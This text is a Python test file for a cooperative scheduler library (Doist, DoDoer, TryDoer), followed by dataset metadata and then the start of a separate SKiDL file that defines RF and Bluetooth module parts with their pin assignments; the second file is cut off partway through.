assert not doist.done # still remaining deeds that did not complete
assert doer0.done
assert not doer1.done
assert not doer2.done
assert not doist.deeds
assert doist.doers == doers
# redo
doist.do(tyme=0, limit=2)
assert doist.tyme == 2.0
assert not doist.done # deeds that did not complete
assert doer0.done
assert not doer1.done
assert not doer2.done
assert not doist.deeds
assert doist.doers == doers
# redo
doist.do(tyme=0, limit=2)
assert doist.tyme == 2.0
assert not doist.done # remaining deeds that did not complete
assert doer0.done
assert not doer1.done
assert not doer2.done
assert not doist.deeds
assert doist.doers == doers
# Test extend and remove Doers
# Now manually restart and run manually but do not reach limit so we can
# and extend remove below
doist.done = False
assert not doist.done
doist.tyme = 0.0
assert doist.tyme == 0.0
assert not doist.deeds
assert doist.doers == doers
doist.enter()
assert len(doist.deeds) == 3
doist.recur()
doist.recur()
assert doist.tyme == 2.0
assert not doist.done
assert doer0.done
assert not doer1.done
assert not doer2.done
assert len(doist.deeds) == 2 # deeds still there
# test extend Doers
doer3 = TryDoer(stop=1)
doer4 = TryDoer(stop=2)
moredoers = [doer3, doer4]
doist.extend(doers=list(moredoers)) # make copy
assert doist.doers == doers + moredoers
assert len(doist.doers) == 5
assert len(doist.deeds) == 4
indices = [index for dog, retyme, index in doist.deeds]
doers = [doer for dog, retyme, doer in doist.deeds]
assert doers == [doer1, doer2, doer3, doer4]
doist.recur()
doist.recur()
assert doist.tyme == 4.0
assert not doist.done # doist not done
assert doer0.done
assert doer1.done
assert doer2.done
assert doer3.done
assert not doer4.done
assert len(doist.deeds) == 1 # deeds still there
doist.exit()
assert doist.done == False # forced close so not done
assert doer0.done
assert doer1.done
assert doer2.done
assert doer3.done
assert not doer4.done # forced close so not done
assert not doist.deeds
""" Done Test"""
def test_doist_remove():
"""
Test Doist.remove of doers
"""
tock = 1.0
limit = 5.0
# start over with full set to test remove
doer0 = TryDoer(stop=1)
doer1 = TryDoer(stop=2)
doer2 = TryDoer(stop=3)
doer3 = TryDoer(stop=2)
doer4 = TryDoer(stop=3)
doers = [doer0, doer1, doer2, doer3, doer4]
doist = doing.Doist(tock=tock, doers=list(doers), always=True)
assert doist.tock == tock == 1.0
assert doist.tyme == 0.0
assert doist.doers == doers
for doer in doist.doers:
assert doer.done == None
assert doist.done == None
assert not doist.deeds
doist.enter()
assert doist.done == None # did not call .do so stays None not False
doist.recur()
doist.recur()
assert doist.tyme == 2.0
assert not doist.done # doist not done
assert doer0.done
assert not doer1.done
assert not doer2.done
assert not doer3.done
assert not doer4.done
assert len(doist.deeds) == 4 # deeds still there
doers = [doer for dog, retyme, doer in doist.deeds]
assert doers == [doer1, doer2, doer3, doer4] # doer0 is removed
for dog, retyme, doer in doist.deeds:
assert not doer.done
doist.remove(doers=[doer0, doer1, doer3])
assert doist.doers == [doer2, doer4]
assert len(doist.deeds) == 2
doers = [doer for dog, retyme, doer in doist.deeds]
assert doers == [doer2, doer4] # others are removed
for dog, retyme, doer in doist.deeds:
assert not doer.done
assert not doer1.done # forced exit
assert not doer3.done # forced exit
doist.recur()
doist.recur()
assert doist.tyme == 4.0
assert doist.done == None # never called .do
assert len(doist.deeds) == 0 # all done
assert len(doist.doers) == 2 # not removed but completed
for doer in doist.doers:
assert doer.done
assert doer0.done # already clean done before remove
assert not doer1.done # forced exit upon remove before done
assert doer2.done # clean done
assert not doer3.done # forced exit upon remove before done
assert doer4.done # clean done
doist.recur()
doist.recur() # does not complete because always == True
"""Done Test"""
def test_doist_remove_by_own_doer():
"""
Test .remove method of Doist called by a doer of Doist
"""
tock = 1.0
limit = 5.0
# create doist first so can inject it into removeDo
doist = doing.Doist(tock=tock, limit=limit)
# create doized function that removes doers
@doing.doize(tock=0.0, doist=doist)
def removeDo(tymth=None, tock=0.0, doist=None, **opts):
"""
Returns generator function (doer dog) to process
to remove all doers of doist but itself
Parameters:
tymth is injected function wrapper closure returned by .tymen() of
Tymist instance (e.e. Doist/DoDoer). Calling tymth() returns
associated Tymist .tyme.
tock is injected initial tock value from doer.tock
opts is dict of injected optional additional parameters from doer.opts
Injected attributes by doize decorator as parameters to this method:
gf.tock = tock # default tock attribute for doer
gf.opts = {} # default opts for doer
Usage:
add to doers list
"""
rdoers = []
yield # enter context also makes generator method
# recur context
for doer in doist.doers:
# doize decorated function satisfies '==' but not 'is'
if doer != removeDo: # must be != vs. is not
rdoers.append(doer)
doist.remove(rdoers)
yield # extra yield for testing so does a couple of passes after removed
yield # extra yield for testing so does a couple of passes after removed
return True # once removed then return to remove itself as doer
# create other doers to remove
doer0 = TryDoer(stop=1)
doer1 = TryDoer(stop=2)
doer2 = TryDoer(stop=3)
doer3 = TryDoer(stop=2)
doer4 = TryDoer(stop=3)
doers = [doer0, doer1, doer2, doer3, doer4, removeDo]
doist.doers = list(doers) # make copy
assert doist.tock == tock == 1.0
assert doist.tyme == 0.0
assert doist.limit == limit == 5.0
assert doist.doers == doers
assert removeDo in doist.doers
for doer in doist.doers:
assert doer.done == None
assert doist.done == None
assert not doist.deeds
doist.enter()
assert not doist.done
doist.recur() # should run removeDo and remove all but itself
assert doist.tyme == 1.0
assert doist.deeds
assert not doist.done # doist not done
assert len(doist.doers) == 1
assert removeDo in doist.doers
# force exited so not done
assert not doer0.done
assert not doer1.done
assert not doer2.done
assert not doer3.done
assert not doer4.done
doist.recur()
assert doist.tyme == 2.0
assert doist.deeds
assert not doist.done # dodoer not done
assert doist.deeds
assert len(doist.doers) == 1
assert removeDo in doist.doers
doist.recur()
assert doist.tyme == 3.0
assert not doist.deeds
assert not doist.done
assert len(doist.doers) == 1
assert removeDo in doist.doers
assert removeDo.done
"""Done Test"""
def test_doist_remove_own_doer():
"""
Test .remove method of Doist called by a doer of Doist that removes all
doers including itself.
"""
tock = 1.0
limit = 5.0
# create doist first so can inject it into removeDo
doist = doing.Doist(tock=tock, limit=limit)
# create doized function that removes doers
@doing.doize(tock=0.0, doist=doist)
def removeDo(tymth=None, tock=0.0, doist=None, **opts):
"""
Returns generator function (doer dog) to process
to remove all doers of doist but itself
Parameters:
tymth is injected function wrapper closure returned by .tymen() of
Tymist instance (e.e. Doist/DoDoer). Calling tymth() returns
associated Tymist .tyme.
tock is injected initial tock value from doer.tock
opts is dict of injected optional additional parameters from doer.opts
Injected attributes by doize decorator as parameters to this method:
gf.tock = tock # default tock attribute for doer
gf.opts = {} # default opts for doer
Usage:
add to doers list
"""
yield # enter context also makes generator method
# recur context
doist.remove(list(doist.doers)) # attept to remove all doers including itself
yield # extra yield for testing so does a couple of passes after removed
yield # extra yield for testing so does a couple of passes after removed
return True # once removed then return to remove itself as doer
# create other doers to remove
doer0 = TryDoer(stop=1)
doer1 = TryDoer(stop=2)
doer2 = TryDoer(stop=3)
doer3 = TryDoer(stop=2)
doer4 = TryDoer(stop=3)
doers = [doer0, doer1, doer2, doer3, doer4, removeDo]
doist.doers = list(doers) # make copy
assert doist.tock == tock == 1.0
assert doist.tyme == 0.0
assert doist.limit == limit == 5.0
assert doist.doers == doers
assert removeDo in doist.doers
for doer in doist.doers:
assert doer.done == None
assert doist.done == None
assert not doist.deeds
doist.enter()
assert not doist.done
doist.recur() # should run removeDo and remove all but itself
assert doist.tyme == 1.0
assert doist.deeds # doer removed by not deed.
assert not doist.done # doist not done
assert not doist.doers
assert not removeDo in doist.doers
# force exited so not done
assert not doer0.done
assert not doer1.done
assert not doer2.done
assert not doer3.done
assert not doer4.done
assert not removeDo.done
doist.recur()
assert doist.tyme == 2.0
assert doist.deeds
assert not doist.done # dodoer not done
assert doist.deeds
assert not doist.doers
doist.recur()
assert doist.tyme == 3.0
assert not doist.deeds
assert not doist.done
assert removeDo.done # finished on it own
"""Done Test"""
def test_nested_doers():
"""
Test Doist running nested DoDoers and Doers
"""
tock = 0.03125
doist = doing.Doist(tock=tock)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == False
assert doist.limit == None
assert doist.doers == []
doer0 = doing.ExDoer(tock=0.0, tymth=doist.tymen())
doer1 = doing.ExDoer(tock=tock*2, tymth=doist.tymen())
assert doer0.tock == 0.0
assert doer1.tock == tock * 2
aDoers = [doer0, doer1]
for doer in aDoers:
assert doer.states == []
assert doer.count == None
assert doer.done == None
aDoer = doing.DoDoer(tock=0.0, tymth=doist.tymen(), doers=aDoers)
assert aDoer.doers == aDoers
assert aDoer.done == None
doer2 = doing.ExDoer(tock=0.0, tymth=doist.tymen())
doer3 = doing.ExDoer(tock=tock*4, tymth=doist.tymen())
assert doer2.tock == 0.0
assert doer3.tock == tock * 4
bDoers = [doer2, doer3]
for doer in bDoers:
assert doer.states == []
assert doer.count == None
assert doer.done == None
bDoer = doing.DoDoer(tock=tock*2, tymth=doist.tymen(), doers=bDoers)
assert bDoer.doers == bDoers
assert bDoer.done == None
doers = [aDoer, bDoer]
ticks = 8
limit = tock * ticks
doist.do(doers=doers, limit=limit) # run em all
assert doist.tyme == limit == 0.25
assert aDoer.done == True
assert bDoer.done == False
assert doer0.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer1.done == True
assert doer1.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='recur', feed=0.125, count=3),
State(tyme=0.1875, context='recur', feed=0.1875, count=4),
State(tyme=0.1875, context='exit', feed=None, count=5)]
assert doer1.done == True
assert doer2.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='recur', feed=0.125, count=3),
State(tyme=0.1875, context='recur', feed=0.1875, count=4),
State(tyme=0.1875, context='exit', feed=None, count=5)]
assert doer2.done == True
assert doer3.states == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.125, context='recur', feed=0.125, count=2),
State(tyme=0.25, context='close', feed=None, count=3),
State(tyme=0.25, context='exit', feed=None, count=4)]
assert doer3.done == False
"""End Test """
def test_doist_dos():
"""
Test doist.do with dos generator functions not generator methods
"""
tock = 0.03125
doist = doing.Doist(tock=tock)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == False
assert doist.limit == None
assert doist.doers == []
doer0 = doing.doify(doing.doifyExDo, name='gf0', tock=tock, states=None)
assert inspect.isgeneratorfunction(doer0)
assert doer0.opts["states"] == None
doer0.opts['states'] = []
assert doer0.tock == tock
assert doer0.done == None
doer1 = doing.doify(doing.doifyExDo, name='gf1', tock=tock*2)
assert inspect.isgeneratorfunction(doer1)
assert not doer1.opts
doer1.opts['states'] = []
assert doer1.tock == tock * 2
assert doer1.done == None
assert doer0 is not doer1
doer2 = doing.doizeExDo
assert inspect.isgeneratorfunction(doer2)
assert doer2.opts["states"] == None
doer2.opts["states"] = []
doer2.tock = tock * 2
assert doer2.done == None
doers = [doer0, doer1, doer2]
for doer in doers:
assert doer.opts['states'] == []
ticks = 4
limit = tock * ticks
doist.do(doers=doers, limit=limit)
assert doist.tyme == limit == 0.125
assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer0.done == True
assert doer1.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
assert doer1.done == False
assert doer2.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
assert doer2.done == False
# repeat but real time
doist = doing.Doist(tock=tock, real=True, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == True
assert doist.limit == limit == 0.125
assert doist.doers == []
for doer in doers:
doer.opts['states'] = []
assert doer.opts['states'] == []
doer.done = None
doist.do(doers=doers)
assert doist.tyme == limit == 0.125
assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='recur', feed=0.0625, count=3),
State(tyme=0.09375, context='recur', feed=0.09375, count=4),
State(tyme=0.09375, context='exit', feed=None, count=5)]
assert doer1.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
assert doer2.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.0625, context='recur', feed=0.0625, count=2),
State(tyme=0.125, context='close', feed=None, count=3),
State(tyme=0.125, context='exit', feed=None, count=4)]
# Low limit force close
ticks = 2
limit = tock * ticks
doist = doing.Doist(tock=tock, real=False, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == False
assert doist.limit == limit == 0.0625
assert doist.doers == []
for doer in doers:
doer.opts['states'] = []
assert doer.opts['states'] == []
doer.tock = 0.0 # run asap
doist.do(doers=doers)
assert doist.tyme == limit
assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='close', feed=None, count=3),
State(tyme=0.0625, context='exit', feed=None, count=4)]
assert doer0.opts["states"] == doer1.opts["states"] == doer2.opts["states"]
# low limit force close real time
doist = doing.Doist(tock=tock, real=True, limit=limit)
assert doist.tyme == 0.0 # on next cycle
assert doist.tock == tock == 0.03125
assert doist.real == True
assert doist.limit == limit == 0.0625
assert doist.doers == []
for doer in doers:
doer.opts['states'] = []
assert doer.opts['states'] == []
doer.tock = 0.0 # run asap
doist.do(doers=doers)
assert doist.tyme == limit
assert doer0.opts["states"] == [State(tyme=0.0, context='enter', feed=0.0, count=0),
State(tyme=0.0, context='recur', feed=0.0, count=1),
State(tyme=0.03125, context='recur', feed=0.03125, count=2),
State(tyme=0.0625, context='close', feed=None, count=3),
State(tyme=0.0625, context='exit', feed=None, count=4)]
assert doer0.opts["states"] == doer1.opts["states"] == doer2.opts["states"]
"""End Test """
if __name__ == "__main__":
test_doist_remove_own_doer()
| 39.765021 | 88 | 0.571328 | 5,153 | 37,061 | 4.102076 | 0.04541 | 0.046599 | 0.081843 | 0.078815 | 0.879932 | 0.85377 | 0.83849 | 0.827988 | 0.814126 | 0.797426 | 0 | 0.070318 | 0.29357 | 37,061 | 931 | 89 | 39.807734 | 0.737061 | 0.112112 | 0 | 0.831006 | 0 | 0 | 0.031999 | 0 | 0 | 0 | 0 | 0 | 0.505587 | 1 | 0.015363 | false | 0 | 0.006983 | 0 | 0.02514 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6a73ce4752df31ef74d5c5528dd8b4bc01b237df | 39,042 | py | Python | skidl/libs/rfcom_sklib.py | arjenroodselaar/skidl | 0bf801bd3b74e6ef94bd9aa1b68eef756b568276 | [
"MIT"
] | 700 | 2016-08-16T21:12:50.000Z | 2021-10-10T02:15:18.000Z | skidl/libs/rfcom_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 118 | 2016-08-16T20:51:05.000Z | 2021-10-10T08:07:18.000Z | skidl/libs/rfcom_sklib.py | 0dvictor/skidl | 458709a10b28a864d25ae2c2b44c6103d4ddb291 | [
"MIT"
] | 94 | 2016-08-25T14:02:28.000Z | 2021-09-12T05:17:08.000Z | from skidl import SKIDL, TEMPLATE, Part, Pin, SchLib
SKIDL_lib_version = '0.0.1'
rfcom = SchLib(tool=SKIDL).add_parts(*[
Part(name='BL652',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth Nordic nRF52',description='Bluetooth module',ref_prefix='U',num_units=1,fplist=['Laird*BL652*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='SIO_24',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='SIO_23',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='SIO_22',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='SWDCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='SIO_21',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SIO_20',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='SIO_18',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='SIO_16',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='SIO_05/AIN3',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='SIO_17',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='SIO_14',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='SIO_04/AIN2',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='SIO_19',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='SIO_12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='SIO_03/AIN1',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='SIO_31/AIN7',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='SIO_11',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='SIO_02/AIN0',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='SIO_30/AIN6',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='SIO_10/NFC2',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='SIO_01',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='SIO_29/AIN5',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='SIO_09/NFC1',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='SIO_00',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='SIO_28/AIN4',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='SIO_27',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='SIO_08',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='37',name='SIO_26',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='SIO_07',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='SIO_13',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='SIO_25',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='SIO_06',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='SIO_15',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='BTM112',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth BT SPP Module',description='Bluetooth SPP Module, UART, Class 2',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='PIO8',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='PIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='PIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='AIO0',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='AIO1',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='RESET',do_erc=True),
Pin(num='7',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='8',name='~SPI_CSB~',do_erc=True),
Pin(num='9',name='SPI_CLK',do_erc=True),
Pin(num='10',name='SPI_MOSI',do_erc=True),
Pin(num='20',name='PCM_IN',do_erc=True),
Pin(num='30',name='PIO1',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='~UART_CTS',do_erc=True),
Pin(num='21',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='PIO0',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='22',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='~UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='23',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='RF',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='UART_RX',do_erc=True),
Pin(num='24',name='~LINK~/PIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='PIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='CONN/PIO6',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='PIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='BTN/PIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='28',name='PIO3',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='PIO2',func=Pin.BIDIR,do_erc=True)]),
Part(name='BTM222',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth BT SPP Module',description='Bluetooth SPP Module, UART, Class 1',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='PVCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='AIO0/SLEEPCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='AIO1',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='PIO0/RXEN',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='PIO1/TXEN',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='PIO2/USB_PU/CLK_REQ_OUT',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PIO3/USB_WKUP/CLK_REQ_IN',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='PIO4/USB_ON/BT_PRIOR',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='20',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='UART_CTS',do_erc=True),
Pin(num='11',name='PIO5/USB_DETACH/BT_ACT',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='SPI_MOSI',do_erc=True),
Pin(num='12',name='PIO6/CLK_REQ/WAN_ACT',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='~SPI_CSB~',do_erc=True),
Pin(num='13',name='PIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='PCM_IN',do_erc=True),
Pin(num='33',name='SPI_CLK',do_erc=True),
Pin(num='14',name='PIO8',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='34',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='PIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='PIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='~RESET~',do_erc=True),
Pin(num='26',name='UART_RX',do_erc=True),
Pin(num='36',name='PIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='37',name='RF',func=Pin.PASSIVE,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='38',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='CC1000',dest=TEMPLATE,tool=SKIDL,keywords='Low Power RF Transciever',description='Single Chip Low Power RF Transceiver, TSSOP28',ref_prefix='U',num_units=1,fplist=['TSSOP*'],do_erc=True,pins=[
Pin(num='1',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='RF_IN',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='RF_OUT',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='10',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='L2',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='CHP_OUT',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='R_BIAS',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='DIO',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='24',name='DCLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='PCLK',do_erc=True),
Pin(num='16',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='PDATA',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='XOSC_Q2',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='PALE',do_erc=True),
Pin(num='18',name='XOSC_Q1',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='RSSI/IF',func=Pin.PASSIVE,do_erc=True),
Pin(num='19',name='AGND',func=Pin.PWRIN,do_erc=True)]),
Part(name='CC1200',dest=TEMPLATE,tool=SKIDL,keywords='RF Tx Rx',description='Low-Power, High-Performance RF Transceiver',ref_prefix='U',num_units=1,fplist=['QFN-32-1EP_5x5mm_Pitch0.5mm', 'QFN-32-1EP_5x5mm_Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='VDD_GUARD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='~RESET~',do_erc=True),
Pin(num='3',name='GPIO3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='DCPL',func=Pin.PWROUT,do_erc=True),
Pin(num='7',name='SI',do_erc=True),
Pin(num='8',name='SCLK',do_erc=True),
Pin(num='9',name='SO(GPIO1)',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GPIO0',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='LNA_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='XOSC_Q1',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='~CS~',do_erc=True),
Pin(num='21',name='DCPL_VCO',func=Pin.PWROUT,do_erc=True),
Pin(num='31',name='XOSC_Q2',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='AVDD_SYNTH1',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='EXT_XOSC',do_erc=True),
Pin(num='13',name='AVDD_IF',func=Pin.PWRIN,do_erc=True),
Pin(num='23',name='LPF0',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='GND_EP',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='RBIAS',func=Pin.PASSIVE,do_erc=True),
Pin(num='24',name='LPF1',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='AVDD_RF',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='AVDD_PFD_CHP',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='DCPL_PFD_CHP',func=Pin.PWROUT,do_erc=True),
